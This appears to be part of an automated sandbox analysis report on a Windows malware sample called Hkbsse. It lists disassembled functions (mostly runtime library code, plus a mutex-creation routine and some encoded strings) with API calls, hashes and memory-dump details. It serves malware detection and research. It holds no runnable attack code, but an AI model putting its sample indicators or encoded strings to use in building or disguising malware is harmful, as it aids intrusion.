Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID: rKB
API String ID: 2750799244-594269022
Opcode ID: 6eeefc93ddb9c0c2cc3c9fcab32222227587c58009ad962a2d0938620b0a3036
Instruction ID: 5860af37039b9e32742a4f63b67b9b20205c57ec04f8fa57200bc9ff335ac920
Opcode Fuzzy Hash: 6eeefc93ddb9c0c2cc3c9fcab32222227587c58009ad962a2d0938620b0a3036
Instruction Fuzzy Hash: 76816FB0A11B22ABD708DF75D845BD9FBA8BF49704F50021FF42897281CBB8A564CBD5

Function 0072F4F6 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0072F53A

Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F0F0
Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F102
Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F114
Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F126
Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F138
Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F14A
Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F15C
Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F16E
Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F180
Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F192
Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F1A4
Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F1B6
Part of subcall function 0072F0D3: _free.LIBCMT ref: 0072F1C8

_free.LIBCMT ref: 0072F52F

Part of subcall function 0072AF8C: HeapFree.KERNEL32(00000000,00000000,?,0072F264,?,00000000,?,?,?,0072F28B,?,00000007,?,?,0072F68D,?), ref: 0072AFA2
Part of subcall function 0072AF8C: GetLastError.KERNEL32(?,?,0072F264,?,00000000,?,?,?,0072F28B,?,00000007,?,?,0072F68D,?,?), ref: 0072AFB4

_free.LIBCMT ref: 0072F551
_free.LIBCMT ref: 0072F566
_free.LIBCMT ref: 0072F571
_free.LIBCMT ref: 0072F593
_free.LIBCMT ref: 0072F5A6
_free.LIBCMT ref: 0072F5B4
_free.LIBCMT ref: 0072F5BF
_free.LIBCMT ref: 0072F5F7
_free.LIBCMT ref: 0072F5FE
_free.LIBCMT ref: 0072F61B
_free.LIBCMT ref: 0072F633

Strings

8"F, xrefs: 0072F5E2
`'F, xrefs: 0072F50C

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: 8"F$`'F
API String ID: 161543041-3117062166
Opcode ID: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction ID: 50e4ae64d08f65917eb028b44e0c803f548d2f897d9aee4c6ba3d6a52295c0ae
Opcode Fuzzy Hash: 922a2dd1448a5ec672de729c29137a8fc27b2943f4b4aaf69956ccaefb2f6592
Instruction Fuzzy Hash: F73137B1604625EFEB21AE39E949B5A77F8EB00310F20453AE055E71A1DB3CED918B21

Function 006FAA37 Relevance: 26.3, APIs: 4, Strings: 11, Instructions: 55sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 006FAA3A
CreateMutexA.KERNEL32(00000000,00000000,`H|), ref: 006FAA58
GetLastError.KERNEL32 ref: 006FAA60
GetLastError.KERNEL32 ref: 006FAA71

Strings

Rc9tgE9v, xrefs: 006FA5E9
OS9oe0Rw, xrefs: 006FA853
SS9rdE9A, xrefs: 006FA71E
`H|, xrefs: 006FAA47, 006FAA53
pC|, xrefs: 006FA37F
HC|, xrefs: 006FA115
PLNAYy==, xrefs: 006F9EAB
C|, xrefs: 006F99EB
ONZkfkE=, xrefs: 006F9C41
XB|, xrefs: 006F9FE0
OLZC, xrefs: 006FA24A

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ErrorLast$CreateMutexSleep
String ID: C|$HC|$OLZC$ONZkfkE=$OS9oe0Rw$PLNAYy==$Rc9tgE9v$SS9rdE9A$XB|$`H|$pC|
API String ID: 3645482037-1191497074
Opcode ID: 7f75eb3033ac71763095a6051423b2ac46d8d06aeda4dc9a3a6b80d8246d0b60
Instruction ID: 93ce12349af09a828f12931c05c69f418b83d565b46e66d99967bd44899b3d28
Opcode Fuzzy Hash: 7f75eb3033ac71763095a6051423b2ac46d8d06aeda4dc9a3a6b80d8246d0b60
Instruction Fuzzy Hash: 4A01F431540344EBE7109FA8FD08FAA77B5E704B22F100A35F619C72D1DB789844CB6A

Function 0070F22F Relevance: 24.2, APIs: 16, Instructions: 229COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0070F236
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0070F4C2

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: H_prolog3std::invalid_argument::invalid_argument
String ID:
API String ID: 1590901807-0
Opcode ID: 163b5ff406515e44ac50a8b7493924e67a044ffe29e720de80f55e4d6a5877e1
Instruction ID: 24813041f72ddfe2a878c788fdca6303c6e93acde495dcdd34c4bab9a70d038d
Opcode Fuzzy Hash: 163b5ff406515e44ac50a8b7493924e67a044ffe29e720de80f55e4d6a5877e1
Instruction Fuzzy Hash: DE818E31E00259DBCF25DFA8C885BAEB7F4BF45314F244629E801AB6C2D77CA945CB51

Function 007228D5 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 007228E7

Part of subcall function 007226E5: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00722708

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00722908
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00722915
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00722963
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 007229EA
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 007229FD
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00722A4A

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 92c16f799a48bc497ddfc13ccace3655e51c18cad8e929827737632f692e731c
Instruction ID: 6f0966a3a66e50c8bdfdfba85b29ad3208dea09ad4b0c2008173a2ebfd4b5314
Opcode Fuzzy Hash: 92c16f799a48bc497ddfc13ccace3655e51c18cad8e929827737632f692e731c
Instruction Fuzzy Hash: 73817A70900269BBDF169F54E985BBE7BB1AF05304F044098EC813B293C73ADD56DB61

Function 0043266E Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00432680

Part of subcall function 0043247E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004324A1

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 004326A1
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 004326AE
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 004326FC
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00432783
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00432796
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 004327E3

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
String ID:
API String ID: 2530155754-0
Opcode ID: 92c16f799a48bc497ddfc13ccace3655e51c18cad8e929827737632f692e731c
Instruction ID: ee37e89b1d530146b8b96656d37106c69ba8b693bc18f40608ecd934774e8980
Opcode Fuzzy Hash: 92c16f799a48bc497ddfc13ccace3655e51c18cad8e929827737632f692e731c
Instruction Fuzzy Hash: 8681C230900209ABDF169F54DA81BFF7B72BF59308F04509AEC402B362C7BA8D15DB69

Function 007146E5 Relevance: 22.7, APIs: 15, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 007146EC
ListArray.LIBCONCRT ref: 0071473F

Part of subcall function 00714520: RtlInitializeSListHead.NTDLL(?), ref: 007145EC
Part of subcall function 00714520: RtlInitializeSListHead.NTDLL(?), ref: 007145F6

ListArray.LIBCONCRT ref: 00714773
Hash.LIBCMT ref: 007147DC
Hash.LIBCMT ref: 007147EC
RtlInitializeSListHead.NTDLL(?), ref: 00714881
RtlInitializeSListHead.NTDLL(?), ref: 0071488E
RtlInitializeSListHead.NTDLL(?), ref: 0071489B
RtlInitializeSListHead.NTDLL(?), ref: 007148A8

Part of subcall function 00719E48: std::bad_exception::bad_exception.LIBCMT ref: 00719E6A

RegisterWaitForSingleObject.KERNEL32(?,00000000,004279B5,?,000000FF,00000000), ref: 00714930
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00714952
GetLastError.KERNEL32(00715692,?,?,00000000,?,?), ref: 00714964
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 00714981

Part of subcall function 0070FDB1: CreateTimerQueueTimer.KERNEL32(?,?,00000000,?,?,00715692,00000008,?,00714986,?,00000000,004279A6,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0070FDC9

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007149AB

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorH_prolog3LastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 1224710184-0
Opcode ID: 0cc5cee6ee34294b39c4034cc4bcb95c5defaf9be2f3115d682d146fe8f5ffc0
Instruction ID: 25f2821ca85afeb3ebf3ebba2d00cf2373651919d578535fd45beb1f6816d952
Opcode Fuzzy Hash: 0cc5cee6ee34294b39c4034cc4bcb95c5defaf9be2f3115d682d146fe8f5ffc0
Instruction Fuzzy Hash: F88150B0A11B56FBD714DF78C849BD9FBA8BF08700F10021AF52897281DBB8A564CBD1

Function 00712A39 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 00712A48

Part of subcall function 00713D33: GetVersionExW.KERNEL32(?), ref: 00713D57
Part of subcall function 00713D33: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00713DF6

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00712A5C
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00712A7D
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00712AE6
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00712B1A

Part of subcall function 007109F4: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 00710A14

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00712B9A

Part of subcall function 00712563: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00712577

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00712BE2

Part of subcall function 007109C9: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 007109E5

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00712BF6
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00712C07
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00712C54
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00712C79
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00712C85

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
Instruction ID: 31af1aeaaeb0bb424b2130ebe48d2c1b572177678f7e528a56894f2e1b68822c
Opcode Fuzzy Hash: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
Instruction Fuzzy Hash: DB81B071A04516CFCB18DFACD8D05EDB7B1BB48300B64413DD442A7682EBB8ADD2CB95

Function 004227D2 Relevance: 19.7, APIs: 13, Instructions: 223COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 004227E1

Part of subcall function 00423ACC: GetVersionExW.KERNEL32(?), ref: 00423AF0
Part of subcall function 00423ACC: Concurrency::details::WinRT::Initialize.LIBCONCRT ref: 00423B8F

Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 004227F5
Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422816
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0042287F
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004228B3

Part of subcall function 0042078D: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 004207AD

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00422933

Part of subcall function 004222FC: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00422310

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0042297B

Part of subcall function 00420762: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 0042077E

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 0042298F
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 004229A0
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004229ED
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00422A12
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00422A1E

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Manager::Resource$Affinity$Apply$Restrictions$Information$Topology$CaptureProcessRestriction::Version$CleanupConcurrency::details::platform::__FindGroupInitializeLimitsLogicalProcessorRetrieveSystem
String ID:
API String ID: 4140532746-0
Opcode ID: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
Instruction ID: ce882e14882d44da4d34594b85a71d8b73c613c218c8cfe4f97325181c9db837
Opcode Fuzzy Hash: 23a81d7dc498b8ed6e4a0c25582b364ec4e86f560bd5afd4b3cea365d55d1a93
Instruction Fuzzy Hash: 2681B471B00526ABCB18DFA9EA9066EB7F1BB48304F94413FD441A7740E7F8A981CB49

Function 007254AC Relevance: 19.6, APIs: 7, Strings: 4, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 007255A7
type_info::operator==.LIBVCRUNTIME ref: 007255CE
___TypeMatch.LIBVCRUNTIME ref: 007256DA
CatchIt.LIBVCRUNTIME ref: 0072572F
IsInExceptionSpec.LIBVCRUNTIME ref: 007257B5
_UnwindNestedFrames.LIBCMT ref: 0072583C
CallUnexpected.LIBVCRUNTIME ref: 00725857

Strings

%5, xrefs: 0072585C
csm, xrefs: 00725605
csm, xrefs: 007254E7
csm, xrefs: 00725554

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$%5
API String ID: 4234981820-2753281567
Opcode ID: 8e3e93dc056ab8fd5de83e8c65849bf1026f44a4fd8d946d8d6c1e4fea1a4fc4
Instruction ID: 823c6a1725507239a739f27fed131c20bd5d392dd4fbf5417e4d88dca808877e
Opcode Fuzzy Hash: 8e3e93dc056ab8fd5de83e8c65849bf1026f44a4fd8d946d8d6c1e4fea1a4fc4
Instruction Fuzzy Hash: C6C1AC71C00A29EFCF25DFA4E8859AEBBB5FF14310F54415AE8116B202D739DA61CFA1

Function 0070C659 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 138threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0070C681
GetCurrentThreadId.KERNEL32 ref: 0070C69E
GetCurrentThreadId.KERNEL32 ref: 0070C6B3
_xtime_get.LIBCPMT ref: 0070C6FF
GetCurrentThreadId.KERNEL32 ref: 0070C731
__Xtime_diff_to_millis2.LIBCPMT ref: 0070C749
_xtime_get.LIBCPMT ref: 0070C768
GetCurrentThreadId.KERNEL32 ref: 0070C772
GetCurrentThreadId.KERNEL32 ref: 0070C7C9

Strings

1o, xrefs: 0070C6F9, 0070C742, 0070C762, 0070C6FE, 0070C745, 0070C767

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
String ID: 1o
API String ID: 3943753294-4284608487
Opcode ID: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
Instruction ID: ed00777620b6a98771cc693f1c00db092e47728db5a0da40a6ea375632f97f91
Opcode Fuzzy Hash: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
Instruction Fuzzy Hash: 14515A35900206CFCF22DF64C9859AD77F0EF08711B2457A9E8069B2A2DB39ED81CF55

Function 00722B74 Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00722B86

Part of subcall function 007226E5: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00722708

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00722BA7
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00722BB4
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00722C02
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00722CAA
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00722CDC

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: fa0e7fc0e602adf7ef079a93edefd6d952696e84445011e42749ab43f13d59f2
Instruction ID: b184493b4d86f48315db14e91145bd0f0d4733a91673f546f8f37145e79e7976
Opcode Fuzzy Hash: fa0e7fc0e602adf7ef079a93edefd6d952696e84445011e42749ab43f13d59f2
Instruction Fuzzy Hash: 8E71AB70A00229BBDF159F64E984BBEBBB2AF45304F044098EC016B293C73ADD57DB61

Function 0043290D Relevance: 16.7, APIs: 11, Instructions: 222COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 0043291F

Part of subcall function 0043247E: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004324A1

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00432940
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 0043294D
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0043299B
Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00432A43
Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00432A75

Memory Dump Source

Source File: 00000015.00000002.4551006254.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.4551006254.0000000000469000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
String ID:
API String ID: 1256429809-0
Opcode ID: fa0e7fc0e602adf7ef079a93edefd6d952696e84445011e42749ab43f13d59f2
Instruction ID: 899863d1ed2fcdcb937afacb890ff96b2e6b6cd524c2a7fd7d5e0d5508c61657
Opcode Fuzzy Hash: fa0e7fc0e602adf7ef079a93edefd6d952696e84445011e42749ab43f13d59f2
Instruction Fuzzy Hash: 5771AF70A00209AFDF15DF54CA81BBFBBB1AF49304F04509AEC506B352C7BA9D16DB69

Function 0071EC30 Relevance: 16.6, APIs: 11, Instructions: 148windowCOMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0071EC80

Part of subcall function 00719136: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00719157

Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 0071EC99
Concurrency::location::_Assign.LIBCMT ref: 0071ECAF
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0071ED1C
Concurrency::details::SchedulerBase::ClearQuickCacheSlot.LIBCMT ref: 0071ED24
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0071ED4B
Concurrency::details::VirtualProcessor::EnsureAllTasksVisible.LIBCONCRT ref: 0071ED57
Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 0071ED8F
Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0071EDAE
Concurrency::details::SchedulerBase::VirtualProcessorIdle.LIBCONCRT ref: 0071EDBC
Concurrency::details::ReferenceCountedQuickBitSet::InterlockedClear.LIBCONCRT ref: 0071EDE3

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$ContextVirtual$Processor::QuickScheduler$ClearCountedEventIdleInterlockedProcessorReferenceSet::$AssignAvailableBlockedCacheConcurrency::location::_DeactivateEnsureInternalMakeSlotSpinTasksThrowTraceUntilVisible
String ID:
API String ID: 3608406545-0
Opcode ID: 7149dbd63549f7799fb9a10f107c66b60902d38dea3d70be5e00c77da91dc22e
Instruction ID: aa552836b6a5a925ee3216fd5986e614724a74f49950439017fdb9180a376687
Opcode Fuzzy Hash: 7149dbd63549f7799fb9a10f107c66b60902d38dea3d70be5e00c77da91dc22e
Instruction Fuzzy Hash: 0C517134700204DFDB14EF68C889BED77A5AF49311F1900A5ED469B2C7CB78AD85CBA2

Function 006F5D87 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

So0geFUu, xrefs: 006F6813

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID:
String ID: So0geFUu
API String ID: 0-1934713169
Opcode ID: 5fa41b3d853af93cc8b5324471e491cd074f5bddc2506b3bf91e25db8c5ef262
Instruction ID: 0b37527904541dff7e4c05176cfedc1ce6039d3f63569f2b2b70321cdfbaf812
Opcode Fuzzy Hash: 5fa41b3d853af93cc8b5324471e491cd074f5bddc2506b3bf91e25db8c5ef262
Instruction Fuzzy Hash: 2CF1B17090025CEBDB24DF54CC89BEEBBB9EB44304F5042A9F619A72C1DB749A84CF95

Function 006F7EA7 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 388libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,00462014), ref: 006F7F21
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006F7F82
GetProcAddress.KERNEL32(00000000), ref: 006F7F89
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 006F804E

Strings

0B|, xrefs: 006F7F61
K AsRO==, xrefs: 006F8209
C|, xrefs: 006F81B2, 006F825A, 006F8302
K AtPe==, xrefs: 006F82B1
K AsQe==, xrefs: 006F8359

Memory Dump Source

Source File: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_6f0000_Hkbsse.jbxd

Yara matches

Similarity

API ID: AddressHandleInfoModuleProcSystemVersion
String ID: 0B|$K AsQe==$K AsRO==$K AtPe==$C|
API String ID: 1456109104-1723995062
Opcode ID: e7d3788c8dda92cd2511c4c600283647bb0029eb3f86137f6af6693677f995bc
Instruction ID: 77fde8faa48c4816bf9c77dbc899c330dfc077e9bc7d92673476816809e8eb3b
Opcode Fuzzy Hash: e7d3788c8dda92cd2511c4c600283647bb0029eb3f86137f6af6693677f995bc
Instruction Fuzzy Hash: D3D13770E00658EBDF14AB28CD0A7AD7BA2AB81314F5442DCE915973C1EB795E848BC7

Function 00716BE1 Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00716C26
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00716C58
List.LIBCONCRT ref: 00716C93
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00716CA4
Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00716CC0
List.LIBCONCRT ref: 00716CFB
Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00716D0C
Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00716D27
List.LIBCONCRT ref: 00716D62
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00716D6F

Part of subcall function 007160E6: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 007160FE
Part of subcall function 007160E6: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00716110

Memory Dump Source

